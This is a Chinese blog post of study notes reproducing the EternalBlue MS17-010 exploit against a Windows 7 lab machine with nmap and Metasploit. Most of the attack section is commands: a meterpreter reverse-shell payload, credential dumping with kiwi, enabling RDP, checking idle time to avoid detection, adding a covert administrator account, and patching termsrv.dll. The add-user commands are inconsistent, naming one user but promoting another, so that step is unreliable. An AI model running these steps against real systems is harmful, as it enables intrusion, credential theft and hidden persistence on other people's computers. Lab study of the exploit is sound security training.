永恒之蓝ms17-010漏洞复现

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量292 收藏 2
点赞数 2
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63092550/article/details/134442413
版权

永恒之蓝ms17-010漏洞复现

注:本文为个人学习笔记,文章部分内容转载自他人文章,文章详情可查看

【精选】Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)-CSDN博客

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_metasploit 永恒之蓝_Zichel77的博客-CSDN博客

  • 环境要求:

虚拟机:VMware Workstation 16  下载网址:Windows 虚拟机 | Workstation Pro | VMware | CN

攻击机:kali | 镜像下载:Index of /kali-images/

靶机:Win7 |镜像下载:MSDN, 我告诉你 - 做一个安静的工具站 (itellyou.cn)

  • 准备工作:

 1.首先要将靶机的防火墙关闭,因为防火墙开启可能会导致nmap扫描不到其端口,MSF无法利用漏洞进行攻击。

  1. 确保攻击机和靶机的ip地址在同一网段(分别用ifconfig和ipconfig查询ip地址),可以试着让两台机器相互ping,判断是否可以相互通信。

  • 漏洞复现:

  1. 通过nmap扫描靶机端口

 nmap -sS 192.168.16.132

扫描发现445端口开启(永恒之蓝借助445端口传播),因此可以加以利用。

  1. 利用msfconsole查询漏洞利用模块。

  msfconsole

  search ms17-010

use exploit/windows/smb/ms17_010_eternalblue

##利用永恒之蓝漏洞

set payload windows/x64/meterpreter/reverse_tcp

##设置payload

set LHOST 192.168.16.126

##设置本机IP地址

set RHOSTS 192.168.16.132

##设置受害主机IP

set RPORT 445

##设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的139、3389等

exploit

##利用漏洞

看到WIN说明攻击成功。

运行成功后会出现meterpreter> ,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如进入cmd、获取屏幕、上传/下载文件、创建持久后门等。

  • 功能演示:

  1. 获取靶机cmd

meterpreter > shell

chcp 65001  //转换编码

ipconfig  #查看ip

whoami    #查看当前用户名称

  1. 屏幕截图

meterpreter > screenshot  #屏幕截图

  1. 上传文件

meterpreter > upload user.txt c://

返回靶机查看,发现上传成功。

  1. 远程登录:

kiwi模块查看密码(使用kiwi模块需要system管理员权限)

meterpreter > load kiwi //加载kiwi模块

Loading extension kiwi...Success.

creds_all  #列举所有凭据

这里我们可以看到靶机的用户名及密码

exit   #退出

在建立远程连接前,需要靶机的3389端口为打开状态,但3389端口默认为关闭状态。我们可以通过执行远程链接命令来启动靶机的3389端口。

执行命令:

meterpreter > run post/windows/manage/enable_rdp  //启用目标主机的3389端口远程桌面

meterpreter > idletime  //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。

再次查看靶机远程登录设置,发现被修改为可进行远程链接。

root@kali:~# rdesktop 192.168.16.132   //使用 rdesktop 命令远程连接桌面

连接成功,我们使用刚才的用户名密码进行登录

登录成功。

而靶机显示账户已登录。

创建新用户(避免远程登录被发现):

meterpreter > shell            #进入命令行

net user ironman 123456  /add         #新建用户ironman 密码123

net  localgroup  administrators kill /add  #将用户ironman添加到Win7的本地管理员组中,获得管理员权限

net user    #查看用户

(root���kali)-[/home/zyykali38]

└─# rdesktop 192.168.16.132

但是这样会被win7的当前用户提示要不要让远程用户远程连接到本机:

解决方法1:

  1. 输入“gpedit.msc”并回车,打开本地组策略编辑器。
  2. 在组策略编辑器中依次展开“计算机配置”、“管理模板”、“Windows组件”、“远程桌面服务”和“远程桌面会话主机”。
  3. 右侧窗口中找到“限制每个用户只能有一个会话”选项,将其禁用。
  4. 保存设置并关闭组策略编辑器。

解决方法2:

下载补丁,补丁名称为 universal termsrv.dll path

继续连接,连接成功。

ζั͡ޓއއއ昔年丶
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MS17_010(永恒之蓝)漏洞复现
weixin_45253622的博客
03-06 432
MS17_010(永恒之蓝)漏洞复现 kali控制台输入:msfdb init 初始化msf数据库 msfconsole打开msf 使用msf自带端口扫描工具扫描目标主机 发现开放445端口,我们扫描ms17_010 使用辅助模块auxiliary先进行扫描是否存在漏洞 输入命令:use auxiliary/scanner/smb/smb_ms17_010 并查看配置信息 设置目标主机 run 发现存在漏洞 选择漏洞攻击模块: use exploit/windows/smb/ms17_0
永恒之蓝漏洞复现(ms17-010)
gjgj的博客
06-18 4991
Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新:apt update ...
win7永恒之蓝微软官方补丁
05-16
没打补丁的赶紧打,网上的关闭端口方法我都试了,关不掉
永恒之蓝漏洞补丁-MS17010补丁列表KB号
热门推荐
神秘人的博客
05-17 1万+
MS17010补丁列表 不同版本的操作系统对应的MS17-010补丁编号如下 winxp特别补丁KB4012598 winxp3 32位 Security Update for Windows XP SP3 (KB4012598) winxp2 64位 Security Update for Windows XP SP2 for x64-based Systems (KB4012598) win2003特别补丁KB4012598 2003SP2 32位 Security Update for Windows
永恒之蓝MS17-010)详解
最新发布
m0_64481831的博客
05-29 887
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
Windows勒索病毒“永恒之蓝漏洞补丁
个人视角下的技术领域探索
05-15 1万+
本次勒索病毒感染急剧爆发的主要原因在于: 其传播过程中使用了前段时间泄漏的美国国家安全局(NSA)黑客工具包中的“永恒之蓝漏洞(微软3月份已经发布补丁漏洞编号MS17-010)。 1、仅限Windows_64位操作系统,非Windows操作系统不受影响 2、已更新补丁的的Win10系统亦不受影响 3、为方便下载安装,特此献上下载链接。Windows补丁下载 4、如提示保存,请保存后运
关于永恒之蓝漏洞补丁跟踪及实施记录
weixin_34268579的博客
05-17 294
前言:利用MS17-010 漏洞进行***的蠕虫病毒已经成了自上周末到现在的主要任务,当组织里面有大量的机器时,要在短时间内完成大量业务系统的防护和更新需要耗费大量的人力和资源。当然如果手段和方式得力,事情相对会顺利的多。 目标: 1. 获得所有机器关于MS17-010补丁更新情况,MS17-10 针对window 7\windows 2008 r2及以上版本的...
永恒之蓝MS17-010漏洞复现
tubug的博客
05-21 5669
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
MS17-010永恒之蓝漏洞复现(含新姿势)
qq_37872337的博客
06-13 3120
0x00永恒之蓝简介        永恒之蓝,一个梦幻般的名字,大概只要是搞安全的都应该认识该漏洞吧。这是一个非常经典的漏洞,同样也是一个危害极大的漏洞。在2017年,著名的勒索病毒在全球肆虐,令很多人闻风丧胆,其中黑阔们就是利用的ms17-010漏洞,预防的方式无非是打补丁(现在部分企业内仍存在此漏洞),下面贴上一张手册: 从图中可见,Windows XP、Windows 7、Windows server 2003、Windows s
漏洞复现-永恒之蓝(MS17-010)
qq_43381463的博客
10-17 752
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
win7永恒之蓝漏洞修复方案
afjkslahdfkaJDHU的博客
12-12 4388
1、为计算机安装最新的安全补丁,网址为Microsoft 安全公告 MS17-010 - 严重 | Microsoft Docs。 2.开启防火墙 打开控制面板,点击系统和安全,找到防火墙,打开防火墙 3.关闭445端口 WIN+R 运行--regedit 找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters” 选择“Parameters”项,右键单击,选择“新建”——“DWORD值”。(64位..
永恒之蓝XP补丁
03-28
最近蓝屏病毒肆孽,好不容易找到个XP蓝屏补丁,大家可以补这个
ms17-101补丁永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
MS17-010 补丁
05-15
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
win7键盘漏洞补丁
04-23
在win7下直接运行,省得到官方下载,需要E-Mail及密码等等。
永恒之蓝漏洞复现ms17-010
weixin_53730939的博客
01-10 644
永恒之蓝漏洞复现
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 6063
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
sinat_27757177的博客
10-17 4999
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
永恒之蓝漏洞原理及漏洞复现
m0_66908617的博客
02-10 3114
摘要永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,、整个以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。上文提到了SMB协议。
vmware win7
07-29
VMware是一个强大的虚拟机软件,可以在一台电脑上模拟真实的环境,创建出一个虚拟机系统。你可以通过安装VMware和下载Win7系统镜像来在虚拟机中安装Win7系统。首先,你需要安装VMware软件,推荐使用VMware12或者VMware11版本。然后,你可以通过下载Win7镜像文件来准备安装系统。你可以在网上找到可靠的下载链接。安装过程可以参考详细的教程,其中包括了安装步骤和注意事项。安装完成后,你还可以安装VMware Tools来提升虚拟机的功能,如文件拖拽和自动伸缩屏幕等。安装VMware Tools的过程也可以参考详细的教程。\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [在虚拟机vmware中安装windows7保姆级教程](https://blog.csdn.net/ygp12345/article/details/109684547)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v4^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值